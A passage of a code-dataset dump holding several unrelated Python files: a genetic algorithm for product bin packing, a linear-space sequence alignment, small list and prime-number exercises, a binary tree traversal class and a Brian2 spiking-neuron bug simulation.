np.sum(gene_list[i]['data.frame'][:,2]) #將最大限制金額減去每個基因的總金額\n subtraction_price = limit_price-sum_price #預算與商品組合之總價格的差額\n reuslt = abs(subtraction_price)/limit_price #將價格適應度算出\n \n if subtraction_price==0:\n reuslt = reuslt + 1\n elif subtraction_price>0:\n reuslt = reuslt + 2\n else:\n reuslt = reuslt + 3\n \n gene_list[i]['fitPrice'] = np.array([reuslt])\n gene_list[i]['totalPrice'] = np.array([sum_price])\n return(gene_list)\n\n#總體的適應度方法\n#@jit\ndef fitness_total(gene_list):\n #gene_list: 被選擇出的基因清單\n for i in range(len(gene_list)):\n sum_fit = gene_list[i]['fitPrice'][0]*gene_list[i]['fitVolume'][0]*gene_list[i]['fitPreference'][0]\n gene_list[i]['totalFit'] = np.array([sum_fit])\n return(gene_list)\n\n#選擇(競賽法):\n#從父母中隨機挑選出兩個染色體, 這兩染色體互相比較總適應度, 越低者獲勝, 將被複製至交配池中, 直至交配池內的數量與人口數相同\n#@jit\ndef selection(gene_list, pop_amount):\n #gene_list: 被選擇出的基因清單\n #pop_amount: 人口數量\n result = []\n for i in range(pop_amount):\n compare_list = random.sample(gene_list, 2)\n if compare_list[0]['totalFit'][0] < compare_list[1]['totalFit'][0]:\n result.append(compare_list[0])\n elif compare_list[0]['totalFit'][0] > compare_list[1]['totalFit'][0]:\n result.append(compare_list[1])\n else:\n result.append(random.sample(compare_list, 1))\n return(result)\n \n#選擇(競賽法)-2:\n#從父母中隨機挑選出兩個染色體, 這兩染色體互相比較總適應度, 越低者獲勝, 將被複製至交配池中\n#直至交配池內的數量與剩餘人口數(人口數-除菁英數量)相同\n#@jit \ndef selection_second(gene_list, pop_amount, elite_list):\n #gene_list: 被選擇出的基因清單\n #pop_amount: 人口數量\n #elite_list: 菁英清單\n result = []\n for i in range(pop_amount-len(elite_list)):\n compare_list = random.sample(gene_list, 2)\n if compare_list[0]['totalFit'][0] < compare_list[1]['totalFit'][0]:\n result.append(compare_list[0])\n elif compare_list[0]['totalFit'][0] > compare_list[1]['totalFit'][0]:\n result.append(compare_list[1])\n else:\n result.append(random.sample(compare_list, 1)[0])\n for i in range(len(elite_list)):\n result.append(elite_list[i])\n return(result) \n\n\n#交配(雙點交配)-需考慮適應函數值(包含懲罰值)、交配率和重量限制\ndef cross_over(good_data, gene_list, require_goods, non_require_values, cross_rate):\n get_chrom_length = len(require_goods)+non_require_values #取得染色體長度\n get_cross_index = [] #宣告一個放所有染色體index的陣列\n for j in range(len(gene_list)):\n get_cross_index.append(j) #把所有染色體的index放入\n \n for i in range(int(len(gene_list)/2)):\n get_index = random.sample(get_cross_index, 2) #抽取要被交配的基因\n rnd_cross_rate = round(random.random(), 3) #產生亂數\n if rnd_cross_rate<=cross_rate:\n divide_index = sorted(random.sample(range(0, get_chrom_length), 2)) #隨機選擇切割地方(採雙點交配)\n tempChrom_A = copy.deepcopy(gene_list[get_index[0]]) #先將染色體給暫時變數A\n tempChrom_B = copy.deepcopy(gene_list[get_index[1]]) #先將染色體給暫時變數B\n tempChrom_A['chromosome'][divide_index[0]:divide_index[1]] = copy.deepcopy(gene_list[get_index[1]]['chromosome'][divide_index[0]:divide_index[1]]) #開始進行交配, 將第二個基因切割的染色體給第一個基因\n tempChrom_B['chromosome'][divide_index[0]:divide_index[1]] = copy.deepcopy(gene_list[get_index[0]]['chromosome'][divide_index[0]:divide_index[1]]) #開始進行交配, 將第二個基因切割的染色體給第一個基因\n tempChrom_A['data.frame'][divide_index[0]:divide_index[1],:] = copy.deepcopy(gene_list[get_index[1]]['data.frame'][divide_index[0]:divide_index[1],:]) #開始進行交配, 將第二個基因切割的商品給第一個基因\n tempChrom_B['data.frame'][divide_index[0]:divide_index[1],:] = copy.deepcopy(gene_list[get_index[0]]['data.frame'][divide_index[0]:divide_index[1],:]) #開始進行交配, 將第二個基因切割的商品給第一個基因\n tempChrom_A['totalWeight'] = np.sum(tempChrom_A['data.frame'][:,10]) #重新計算總重量\n tempChrom_B['totalWeight'] = np.sum(tempChrom_B['data.frame'][:,10]) #重新計算總重量\n \n tempChrom_A_length = len(tempChrom_A['data.frame']) #取得原始長度\n tempChrom_A_category = np.unique(tempChrom_A['data.frame'][:,8]) #取得所有不重複的種類\n \n for k in range(len(tempChrom_A_category)):\n duplicate_index = np.where(tempChrom_A['data.frame'][:,8] == tempChrom_A_category[k])[0] #取得每個相對應種類的index\n if len(duplicate_index) >= 2:\n tempChrom_A['data.frame'] = np.delete(tempChrom_A['data.frame'], duplicate_index[1:], axis = 0) #除了第一個商品不做刪除, 其餘皆刪除\n \n while len(tempChrom_A['data.frame']) < tempChrom_A_length:\n tempChrom_A_category = tempChrom_A['data.frame'][:,8] #抓出tempChrom_A中data frame的所有種類\n temp_df = copy.deepcopy(good_data) #將原始資料複製一份\n for j in range(len(tempChrom_A_category)):\n temp_df = temp_df[temp_df[:,8]!=tempChrom_A_category[j]] #挑出tempChrom_A中沒有的種類品項\n random_df_row = random.randint(0,(len(temp_df)-1)) #隨機取得沒有重複種類的品項\n random_df_row = temp_df[random_df_row]\n tempChrom_A['data.frame'] = np.vstack((tempChrom_A['data.frame'], random_df_row)) #將隨機取出的資料放入染色體中\n tempChrom_A['data.frame'].sort(axis=0) #將資料按照產品代號排序\n tempChrom_A['chromosome'] = tempChrom_A['data.frame'][:,0] #重新將染色體編碼\n \n \n tempChrom_B_length = len(tempChrom_B['data.frame']) #取得原始長度\n tempChrom_B_category = np.unique(tempChrom_B['data.frame'][:,8]) #取得所有不重複的種類\n \n for k in range(len(tempChrom_B_category)):\n duplicate_index = np.where(tempChrom_B['data.frame'][:,8] == tempChrom_B_category[k])[0] #取得每個相對應種類的index\n if len(duplicate_index) >= 2:\n tempChrom_B['data.frame'] = np.delete(tempChrom_B['data.frame'], duplicate_index[1:], axis = 0) #除了第一個商品不做刪除, 其餘皆刪除\n \n while len(tempChrom_B['data.frame']) < tempChrom_B_length:\n tempChrom_B_category = tempChrom_B['data.frame'][:,8] #抓出tempChrom_A中data frame的所有種類\n temp_df = copy.deepcopy(good_data) #將原始資料複製一份\n for j in range(len(tempChrom_B_category)):\n temp_df = temp_df[temp_df[:,8]!=tempChrom_B_category[j]] #挑出tempChrom_A中沒有的種類品項\n random_df_row = random.randint(0,(len(temp_df)-1)) #隨機取得沒有重複種類的品項\n random_df_row = temp_df[random_df_row]\n tempChrom_B['data.frame'] = np.vstack((tempChrom_B['data.frame'], random_df_row)) #將隨機取出的資料放入染色體中\n tempChrom_B['data.frame'].sort(axis=0) #將資料按照產品代號排序\n tempChrom_B['chromosome'] = tempChrom_B['data.frame'][:,0] #重新將染色體編碼\n \n gene_list[get_index[0]] = copy.copy(tempChrom_A) #將處理完畢的所有資料放回去\n gene_list[get_index[1]] = copy.copy(tempChrom_B) #將處理完畢的所有資料放回去\n get_cross_index.remove(get_index[0]) #刪除已交配完的染色體\n get_cross_index.remove(get_index[1]) #刪除已交配完的染色體\n else:\n get_cross_index.remove(get_index[0]) #刪除已交配完的染色體\n get_cross_index.remove(get_index[1]) #刪除已交配完的染色體\n return(gene_list)\n\n#突變方法, 加入重量限制(突變部分直接隨機突變非必選的商品)\n#@jit \ndef mutation_FN(good_data, gene_list, mutation_rate):\n #good_data: 商品資料集\n #gene_list: 已交配過的基因人口群\n #mutation_rate: 交配率\n for i in range(len(gene_list)):\n rnd_mutation_rate = round(random.random(), 3) #產生亂數\n mutation_index = random.randint(0,(len(gene_list[i]['data.frame'])-1)) #隨機取得要突變的位置\n mutation_data = gene_list[i]['data.frame'][mutation_index] #取得該品項資料\n mutation_id = mutation_data[0] #取得該資料的產品代號\n if rnd_mutation_rate <= mutation_rate:\n mutation_category = mutation_data[8] #取得染色體中要被突變的基因商品種類\n temp_df = goodData[(goodData[:,8]==mutation_category) & (goodData[:,0]!=mutation_id)]\n temp_index = random.randint(0,(len(temp_df)-1)) #從商品資料中隨機取得符合該基因突變的index(不包含自己)\n temp_good = temp_df[temp_index] #取得商品資料\n gene_list[i]['data.frame'][mutation_index] = temp_good #將品項更換程新品項\n gene_list[i]['totalWeight'] = np.sum(crossAfter[i]['data.frame'][:,10]) #重新計算總重量\n gene_list[i]['chromosome'] = gene_list[i]['data.frame'][:,0] #重新將染色體編碼\n return(gene_list)\n \n \n#氣泡排序法(遞增)\n#@jit\ndef bubble_sort_flag(gene_list):\n for i in range(len(gene_list)-1):\n flag = False\n for j in range(len(gene_list)-1-i):\n if gene_list[j]['totalFit'] > gene_list[j+1]['totalFit']:\n flag = True\n tmp = gene_list[j]\n gene_list[j] = gene_list[j+1]\n gene_list[j+1] = tmp\n if flag == False:\n break\n return(gene_list) \n\n\n#將符合體重的群組合併起來\n#@jit\ndef merge_population(first_gene, second_gene, limit_weight):\n new_pop = copy.deepcopy(first_gene) #將此代基因放入新的變數\n for i in range(len(second_gene)):\n new_pop.append(second_gene[i]) #將下代基因加入變數\n condition_pop = []\n for i in range(len(new_pop)):\n if new_pop[i]['totalWeight']<=limit_weight:\n condition_pop.append(new_pop[i])\n result_list = bubble_sort_flag(condition_pop)\n return(result_list)\n\n#將精英群挑選出來\n#@jit\ndef elite_population(merge_list, elite_pop):\n elite_list = merge_list[0:elite_pop]\n return(elite_list)\n\n#新的下一代, 須刪除屬於菁英的染色體, 並且抓取符合群組數量\n#@jit\ndef new_population(merge_list, elite_list, pop_amount):\n new_pop_list = merge_list[len(elite_list):(pop_amount+len(elite_list))] #刪除掉已經是屬於菁英的染色體\n return(new_pop_list)\n\n#更新菁英群組\n#@jit\ndef new_elite_population(old_elite_list, now_elite_list, elite_pop):\n for i in range(len(old_elite_list)):\n now_elite_list.append(old_elite_list[i]) #將舊的菁英與新的菁英合併\n now_elite_list = bubble_sort_flag(now_elite_list) #將菁英人口按照適應函數遞減排序\n new_elite = now_elite_list[0:elite_pop] #取得elite_pop(菁英數量)的成員\n return(new_elite)\n\n\n#----執行----\n#葷素的方法\ngoodData = diet_select(good_data = goodData, diet_habit_list = dietHabit)\n\n#剔除掉不想要的品牌\ngoodData = except_brand(good_data = goodData, except_brand_list = exceptBrandList)\n\n\nlevel = preferenceTable[:,0]\nrequiredList = level[0:6]\nnonRequiredList = (level[len(requiredList):len(level)])\nnonRequiredValues = userItemValues-len(requiredList) #選擇性商品的數量\n\ngoodData = preference_match(good_data = goodData, preference_table = preferenceTable)\n\n##基因演算法開始\n#產生初始口(遵照popAmount數量)\ngeneList = []\nfor i in range(popAmount):\n #geneList.append([])\n geneDict = {'data.frame': initial_pop(good_data = goodData, require_goods = requiredList, non_require_goods = nonRequiredList, non_require_values = nonRequiredValues, limit_weight = maxWeight)}\n #geneList[i].append(geneDict)\n geneList.append(geneDict)\n \n#編碼染色體\ngeneList = create_chromosome(gene_list = geneList)\n\n#計算每個基因總重量\ngeneList = total_weight(gene_list = geneList)\n\n#計算偏好適應度(目前僅計算總偏好值)\nfitnessPreference = fitness_preference(gene_list = geneList, require_goods = requiredList, non_require_values = nonRequiredValues, preference_table = preferenceTable)\n\n#計算體積適應度\nfitnessVolumeAfter = fitness_volume(gene_list = fitnessPreference, bin_volume = maxVolume)\n\n#計算價格適應度\nfitnessPriceAfter = fitness_price(gene_list = fitnessVolumeAfter, limit_price = maxPrice)\n\n#計算總體適應度\nfitnessTotalAfter = fitness_total(gene_list = fitnessPriceAfter)\n\n#選擇(競賽法)\nselectionAfter = selection(gene_list = fitnessTotalAfter, pop_amount = popAmount)\n\n#交配\ncrossAfter = cross_over(good_data = goodData, gene_list = selectionAfter, require_goods = requiredList, non_require_values = nonRequiredValues, cross_rate = crossRate)\n\n#突變\nmutationAfter = mutation_FN(good_data = goodData, gene_list = crossAfter, mutation_rate = mutationRate)\n\n#重新計算偏好適應函數, 體積適應函數, 價格適應函數\nmutationAfter = fitness_preference(gene_list = copy.deepcopy(mutationAfter), require_goods = requiredList, non_require_values = nonRequiredValues, preference_table = preferenceTable)\nmutationAfter = fitness_volume(gene_list = copy.deepcopy(mutationAfter), bin_volume = maxVolume) \nmutationAfter = fitness_price(gene_list = copy.deepcopy(mutationAfter), limit_price = maxPrice)\nmutationAfter = fitness_total(gene_list = copy.deepcopy(mutationAfter))\n\n#將父母代與孩子合併\nmergeList = merge_population(first_gene = fitnessTotalAfter, second_gene = mutationAfter, limit_weight = maxWeight)\n\n#此代的菁英群組\nlatestElite = elite_population(merge_list = mergeList, elite_pop = eliteValues)\n\n#新的下一代\nnewPopulation = new_population(merge_list = mergeList, elite_list = latestElite, pop_amount = popAmount)\n\ngen_values_best = [] #紀錄最好的基因總體適應函數\ngen_values_loss = [] #紀錄最差的基因總體適應函數\ngen_price_best = []\ngen_preference_best = []\n\ngen_values_best.append(latestElite[0]['totalFit'])\ngen_values_loss.append(newPopulation[popAmount-1]['totalFit']) #紀錄最差的總體適應函數\ngen_price_best.append(latestElite[0]['totalPrice']) #紀錄最佳的總價格\ngen_preference_best.append(latestElite[0]['totalPreference']) #紀錄最佳的總偏好\nprint((\"============第 {0} 代============\").format(1))\n\nfor i in range(1, maxGen):\n #選擇\n selectionAfter = selection_second(gene_list = newPopulation, pop_amount = popAmount, elite_list = latestElite)\n \n #交配\n crossAfter = cross_over(good_data = goodData, gene_list = selectionAfter, require_goods = requiredList, non_require_values = nonRequiredValues, cross_rate = crossRate)\n \n #突變\n mutationAfter = mutation_FN(good_data = goodData, gene_list = crossAfter, mutation_rate = mutationRate)\n \n #重新計算偏好適應函數, 體積適應函數, 價格適應函數\n mutationAfter = fitness_preference(gene_list = mutationAfter, require_goods = requiredList, non_require_values = nonRequiredValues, preference_table = preferenceTable)\n mutationAfter = fitness_volume(gene_list = mutationAfter, bin_volume = maxVolume) \n mutationAfter = fitness_price(gene_list = mutationAfter, limit_price = maxPrice)\n mutationAfter = fitness_total(gene_list = mutationAfter)\n \n #將父母代與孩子合併\n mergeList = merge_population(first_gene = newPopulation, second_gene = mutationAfter, limit_weight = maxWeight)\n \n #此代的菁英群組\n nowEliteLiet = elite_population(merge_list = mergeList, elite_pop = eliteValues)\n \n #更新舊代的菁英群組\n latestElite = new_elite_population(old_elite_list = latestElite, now_elite_list = nowEliteLiet, elite_pop = eliteValues)\n \n #下一代基因\n newPopulation = new_population(merge_list = mergeList, elite_list = latestElite, pop_amount = popAmount)\n \n gen_values_best.append(latestElite[0]['totalFit'][0])\n gen_values_loss.append(newPopulation[popAmount-1]['totalFit'][0]) #紀錄最差的總體適應函數\n gen_price_best.append(latestElite[0]['totalPrice'][0]) #紀錄最佳的總價格\n gen_preference_best.append(latestElite[0]['totalPreference'][0]) #紀錄最佳的總偏好\n print((\"============第 {0} 代============\").format(i+1))\n\nresultTime = time.time()-startTime\nprint('花費時間: {0} {1}'.format(resultTime, '秒'))\n\nplt.rcParams['font.sans-serif'] = ['Microsoft JhengHei'] \nplt.rcParams['axes.unicode_minus'] = False\nplt.style.use('bmh')\nplt.plot(gen_values_best, '-') #畫圖來顯示總體適應函數的起伏\nplt.title('裝箱演算法')\nplt.xlabel(\"世代數\")\nplt.ylabel(\"總體適應值\")\n\n\n\n\n\n\n\n\n\n\n#print(time.time() - startTime)","sub_path":"numpy_GA.py","file_name":"numpy_GA.py","file_ext":"py","file_size_in_byte":25722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244263491","text":"with open('BLOSUM62.txt', 'r+') as f:\n acids = f.readline().split()\n acidIndexDict = {acid : i for i, acid in enumerate(acids)}\n scoring_matrix = []\n for i, line in enumerate(f):\n scoring_matrix.append([int(x) for x in line.split()[1:]])\n\n\ndef getScoreValue(acid1, acid2):\n ind1 = acidIndexDict[acid1]\n ind2 = acidIndexDict[acid2]\n\n return scoring_matrix[ind1][ind2]\n\n\ndef initialize_linear_mat(s1, indelPen):\n dp_mat= [[0] * 2 for _ in range(len(s1) + 1)]\n for i in range(len(dp_mat)):\n dp_mat[i][1] = -(i*indelPen)\n\n return dp_mat\n\n\ndef LCSalignmentScore(s1, s2, indelPen):\n bt_dict = {0:'diag', 1:'right', 2:'down'}\n dp_mat = initialize_linear_mat(s1, indelPen)\n\n bt_mat = [''] * len(dp_mat)\n\n for j in range(len(s2)):\n for i, pair in enumerate(dp_mat):\n dp_mat[i][0] = pair[1]\n dp_mat[0][1] = dp_mat[0][0] - indelPen\n for i in range(1, len(dp_mat)):\n var = getScoreValue(s1[i-1], s2[j])\n values = [dp_mat[i-1][0] + var, dp_mat[i][0] - indelPen, dp_mat[i-1][1] - indelPen]\n dp_mat[i][1] = max(values)\n if j == len(s2) - 1:\n bt_mat[i] = bt_dict[values.index(dp_mat[i][1])]\n\n return dp_mat, bt_mat\n\n\ndef findMiddleEdge(s1, s2, indelPen):\n left = s2[:len(s2)//2]\n right = s2[len(s2)//2:]\n matFromLeft, _ = LCSalignmentScore(s1, left, indelPen)\n matFromRight, bt_right = LCSalignmentScore(s1[::-1], right[::-1], indelPen)\n\n matFromRight = matFromRight[::-1]\n bt_right = bt_right[::-1]\n\n vertStart = 0\n horizontalStart = len(left)\n horizontalEnd = len(left)\n midEdgeSum = matFromLeft[0][1] + matFromRight[0][1]\n\n for i in range(len(matFromLeft)):\n if matFromLeft[i][1] + matFromRight[i][1] > midEdgeSum:\n midEdgeSum = matFromLeft[i][1] + matFromRight[i][1]\n vertStart = i\n\n vertEnd = vertStart\n if bt_right[vertStart] == 'diag':\n vertEnd += 1\n horizontalEnd += 1\n elif bt_right[vertStart] == 'down':\n vertEnd += 1\n elif bt_right[vertStart] == 'right':\n horizontalEnd += 1\n\n # return [(vertStart, horizontalStart), (vertEnd, horizontalEnd)] # for problem 46 - Rosalind\n return [(vertStart,horizontalStart), bt_right[vertStart]]\n\n\ndef linearSpaceAlignment(top, bottom, left, right, s1, s2):\n indelPen = 5\n alignment = ['','']\n if left == right:\n for i in range(top, bottom):\n alignment[0] += s1[i]\n alignment[1] += '-'\n return alignment\n if top == bottom:\n for i in range(left, right):\n alignment[1] += s2[i]\n alignment[0] += '-'\n return alignment\n\n (midVert, midHoriz), midEdge = findMiddleEdge(s1[top:bottom], s2[left:right], indelPen)\n midVert += top\n midHoriz += left\n\n alignment = linearSpaceAlignment(top, midVert, left, midHoriz, s1, s2)\n\n if midEdge == 'diag':\n alignment[0] += s1[midVert]\n alignment[1] += s2[midHoriz]\n midVert += 1\n midHoriz += 1\n elif midEdge == 'right':\n alignment[0] += '-'\n alignment[1] += s2[midHoriz]\n midHoriz += 1\n elif midEdge == 'down':\n alignment[0] += s1[midVert]\n alignment[1] += '-'\n midVert += 1\n\n newAlig = linearSpaceAlignment(midVert, bottom, midHoriz, right, s1, s2)\n alignment[0] += newAlig[0]\n alignment[1] += newAlig[1]\n\n return alignment\n\ndef calcScore(alignment, indelPen):\n s1 = alignment[0]\n s2 = alignment[1]\n score = 0\n for i in range(len(s1)):\n if s1[i] == '-' or s2[i] == '-':\n score -= indelPen\n else:\n score += getScoreValue(s1[i], s2[i])\n\n return score\n\nwith open('test.txt', 'r+') as f:\n s1 = f.readline().rstrip()\n s2 = f.readline().rstrip()\n\n\n indelPen = 5\n alignment = linearSpaceAlignment(0, len(s1), 0, len(s2), s1, s2)\n score = calcScore(alignment, indelPen)\n print(score)\n\n print('\\n'.join(alignment))\n","sub_path":"LinearSpaceAlignment.py","file_name":"LinearSpaceAlignment.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"581894454","text":"# chop() removes first and last elements of a list, returns None\n# middle() takes a list, returns new list without first and last elements\n\nfirst_list = ['a', 'b', 'c', 'd', 'e']\nsecond_list = ['f', 'g', 'h', 'i', 'j']\n\ndef chop(first_list) :\n del first_list[0]\n del first_list[len(first_list)-1]\n\ndef middle(second_list) :\n new_list = list(second_list)\n return new_list[1:-1] # note how to pull the last item in a new_list\n\nprint('First list:', first_list)\nprint('Modified first list:', chop(first_list))\n\nprint('Second list:', second_list)\nprint('Modified copy of second list:', middle(second_list))\n","sub_path":"src/0_string_list_chopper.py","file_name":"0_string_list_chopper.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397388236","text":"import math\r\ndef find_num(N):\r\n n = int(math.sqrt(N))\r\n for i in range(1, n+1):\r\n if i == 1:\r\n continue\r\n if N%i == 0:\r\n return False\r\n return True\r\n\r\nM = int(input())\r\nN = int(input())\r\ncount = 0\r\nL = []\r\n\r\nfor i in range(M, N+1):\r\n if i == 1:\r\n continue\r\n if find_num(i):\r\n count += 1\r\n L.append(i)\r\n\r\nprint(sum(L))\r\nprint(min(L))\r\n","sub_path":"CodeUp/hyung_seop/4566.py","file_name":"4566.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550589826","text":"class Node:\n \"\"\"\n Inserting into a Tree\n\n To insert into a tree we use the same node class created above and add an insert method to it The insert method\n compares the value of the node to the parent node and decides to add it as a left node or a right node.\n\n Traversing a Tree\n The tree can be traversed by deciding on a sequence to visit each node. As we can clearly see we can start at a node\n then visit the left sub-tree first and right sub-tree next. Or we can also visit the right sub-tree first and left\n sub-tree next. Accordingly there are different names for these tree traversal methods.\n\n Traversal is a process to visit all the nodes of a tree and may print their values too. Because, all nodes are connected\n via edges (links) we always start from the root (head) node. That is, we cannot randomly access a node in a tree. There\n are three ways which we use to traverse a tree −\n\n In-order Traversal\n Pre-order Traversal\n Post-order Traversal\n\n In-order Traversal\n In this traversal method, the left subtree is visited first, then the root and later the right sub-tree. We should\n always remember that every node may represent a subtree itself.\n\n In the below python program, we use the Node class to create place holders for the root node as well as the left and\n right nodes. Then we create a insert function to add data to the tree. Finally the Inorder traversal logic is\n implemented by creating an empty list and adding the left node first followed by the root or parent node. At last\n the left node is added to complete the Inorder traversal. Please note that this process is repeated for each\n sub-tree until all the nodes are traversed.\n\n Pre-order Traversal\n In this traversal method, the root node is visited first, then the left subtree and finally the right subtree.\n\n In the below python program, we use the Node class to create place holders for the root node as well as the left and\n right nodes. Then we create a insert function to add data to the tree. Finally the Pre-order traversal logic is\n implemented by creating an empty list and adding the root node first followed by the left node. At last the right\n node is added to complete the Pre-order traversal. Please note that this process is repeated for each sub-tree until\n all the nodes are traversed.\n\n Post-order Traversal\n In this traversal method, the root node is visited last, hence the name. First we traverse the left subtree, then\n the right subtree and finally the root node.\n\n In the below python program, we use the Node class to create place holders for the root node as well as the left and\n right nodes. Then we create a insert function to add data to the tree. Finally the Post-order traversal logic is\n implemented by creating an empty list and adding the left node first followed by the right node. At last the root or\n parent node is added to complete the Post-order traversal. Please note that this process is repeated for each\n sub-tree until all the nodes are traversed.\n\n \"\"\"\n def __init__(self, data):\n self.left = None\n self.right = None\n self.data = data\n\n # Insert Node\n def insert(self, data):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.insert(data)\n elif data > self.data:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n self.data = data\n\n # Print the Tree\n def PrintTree(self):\n if self.left:\n self.left.PrintTree()\n print(self.data),\n if self.right:\n self.right.PrintTree()\n\n # Inorder traversal\n # Left -> Root -> Right\n def inorder_traversal(self, root):\n res = []\n if root:\n res = self.inorder_traversal(root.left)\n res.append(root._data)\n res = res + self.inorder_traversal(root.right)\n return res\n\n # Preorder traversal\n # Root -> Left ->Right\n def preorder_traversal(self, root):\n res = []\n if root:\n res.append(root._data)\n res = res + self.preorder_traversal(root.left)\n res = res + self.preorder_traversal(root.right)\n return res\n # Postorder traversal\n # Left ->Right -> Root\n def postorder_traversal(self, root):\n res = []\n if root:\n res = self.postorder_traversal(root.left)\n res = res + self.postorder_traversal(root.right)\n res.append(root._data)\n return res\n\n\nif __name__ == \"__main__\":\n\n root = Node(27)\n root.insert(14)\n root.insert(35)\n root.insert(10)\n root.insert(19)\n root.insert(31)\n root.insert(42)\n root.PrintTree()\n print(root.inorder_traversal(root))\n print(root.preorder_traversal(root))\n print(root.postorder_traversal(root))","sub_path":"ds2_tree.py","file_name":"ds2_tree.py","file_ext":"py","file_size_in_byte":5072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"609895349","text":"from brian2 import *\nimport matplotlib.pyplot as plt\n\nmap_size = 100\nglobal foodx, foody, food_count, bug_plot, food_plot, sr_plot, sl_plot, outbugx, outbugy, outbugang, outfoodx, outfoody, outsrx, outsry, outslx, outsly\n\nfood_count = 0\nfoodx = 50\nfoody = 50\nduration = 50\noutbugx = np.zeros(int(duration / 2))\noutbugy = np.zeros(int(duration / 2))\noutbugang = np.zeros(int(duration / 2))\noutfoodx = np.zeros(int(duration / 2))\noutfoody = np.zeros(int(duration / 2))\noutsrx = np.zeros(int(duration / 2))\noutsry = np.zeros(int(duration / 2))\noutslx = np.zeros(int(duration / 2))\noutsly = np.zeros(int(duration / 2))\n\n# Sensor neurons\na = 0.02\nb = 0.2\nc = -65\nd = 0.5\n\n\nI0 = 1250\ntau_ampa = 1.0 * ms\ng_synpk = 0.4\ng_synmaxval = (g_synpk / (tau_ampa / ms * exp(-1)))\n\nsensor_eqs = '''\n\nx : 1\ny : 1\nx_disp : 1\ny_disp : 1\nfoodxx : 1\nfoodyy : 1\nmag :1\nI = I0 / sqrt(((x-foodxx)**2+(y-foodyy)**2)): 1\n\ndv/dt = (fv - u + mag*I + z*(0-v))/ms : 1\ndz/dt = -z/tau_ampa : 1\nfv = 0.04*v**2 + 5*v + 140 : 1\ndu/dt = a*(b*v - u)/ms : 1\n'''\n\nsensor_reset = '''\nv = c\nu = u + d\n'''\n\nsr = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsr.v = c\nsr.u = c * b\nsr.x_disp = 5\nsr.y_disp = 5\nsr.x = sr.x_disp\nsr.y = sr.y_disp\nsr.foodxx = foodx\nsr.foodyy = foody\nsr.mag = 1\n\nsl = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsl.v = c\nsl.u = c * b\nsl.x_disp = -5\nsl.y_disp = 5\nsl.x = sl.x_disp\nsl.y = sl.y_disp\nsl.foodxx = foodx\nsl.foodyy = foody\nsl.mag = 1\n\nsbr = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsbr.v = c\nsbr.u = c * b\nsbr.foodxx = foodx\nsbr.foodyy = foody\nsbr.mag = 0\n\nsbl = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsbl.v = c\nsbl.u = c * b\nsbl.foodxx = foodx\nsbl.foodyy = foody\nsbl.mag = 0\n\n# The virtual bug\n\ntaum = 4 * ms\nbase_speed = 9.5\nturn_rate = 5 * Hz\n\nbug_eqs = '''\n#equations for movement here\ndx/dt = motor * cos(angle)/ms : 1\ndy/dt = motor * sin(angle) /ms : 1\nmotor = (motorl + motorr)/2 : 1\ndangle/dt = ((motorr - motorl)/(5*sqrt(2)))/ms : 1\ndmotorl/dt = - (motorl/taum) : 1\ndmotorr/dt = - (motorr/taum) : 1\n\n'''\n\nbug = NeuronGroup(1, bug_eqs, clock=Clock(0.2 * ms), method='euler')\nbug.motorl = 0\nbug.motorr = 0\nbug.angle = pi / 2\nbug.x = 0\nbug.y = 0\n\n# Synapses (sensors communicate with bug motor)\nw = 10\nsyn_rr = Synapses(sr, sbl, clock=Clock(0.2 * ms), model='''\n g_synmax:1\n ''',\n on_pre='''\n\t\tz+= g_synmax\n\t\t''')\n\nsyn_rr.connect(i=[0], j=[0])\nsyn_rr.g_synmax = g_synmaxval\n\nsyn_ll = Synapses(sl, sbr, clock=Clock(0.2 * ms), model='''\n g_synmax:1\n ''',\n on_pre='''\n\t\tz+= g_synmax\n\t\t''')\n\nsyn_ll.connect(i=[0], j=[0])\nsyn_ll.g_synmax = g_synmaxval\n\nsyn_r = Synapses(sbr, bug, clock=Clock(0.2 * ms), on_pre='motorr += w')\nsyn_r.connect(i=[0], j=[0])\nsyn_l = Synapses(sbl, bug, clock=Clock(0.2 * ms), on_pre='motorl += w')\nsyn_l.connect(i=[0], j=[0])\n\n# Step for show figure\nstep = 0\nf = figure(1)\nbug_plot = plot(bug.x, bug.y, 'ko')\nfood_plot = plot(foodx, foody, 'b*')\nsr_plot = plot([0], [0], 'w') # Just leaving it blank for now\nsl_plot = plot([0], [0], 'w')\ntitle(\"Time: \"+str(2*step)+\"ms\")\n\n\n# Additional update rules (not covered/possible in above eqns)\n\n@network_operation()\ndef update_positions():\n\n global foodx, foody, food_count\n sr.x = bug.x + sr.x_disp * sin(bug.angle) + sr.y_disp * cos(bug.angle)\n sr.y = bug.y + - sr.x_disp * cos(bug.angle) + sr.y_disp * sin(bug.angle)\n\n sl.x = bug.x + sl.x_disp * sin(bug.angle) + sl.y_disp * cos(bug.angle)\n sl.y = bug.y - sl.x_disp * cos(bug.angle) + sl.y_disp * sin(bug.angle)\n\n if ((bug.x - foodx) ** 2 + (bug.y - foody) ** 2) < 16:\n food_count += 1\n foodx = randint(-map_size + 10, map_size - 10)\n foody = randint(-map_size + 10, map_size - 10)\n\n if (bug.x < -map_size):\n bug.x = -map_size\n bug.angle = pi - bug.angle\n if (bug.x > map_size):\n bug.x = map_size\n bug.angle = pi - bug.angle\n if (bug.y < -map_size):\n bug.y = -map_size\n bug.angle = -bug.angle\n if (bug.y > map_size):\n bug.y = map_size\n bug.angle = -bug.angle\n\n sr.foodxx = foodx\n sr.foodyy 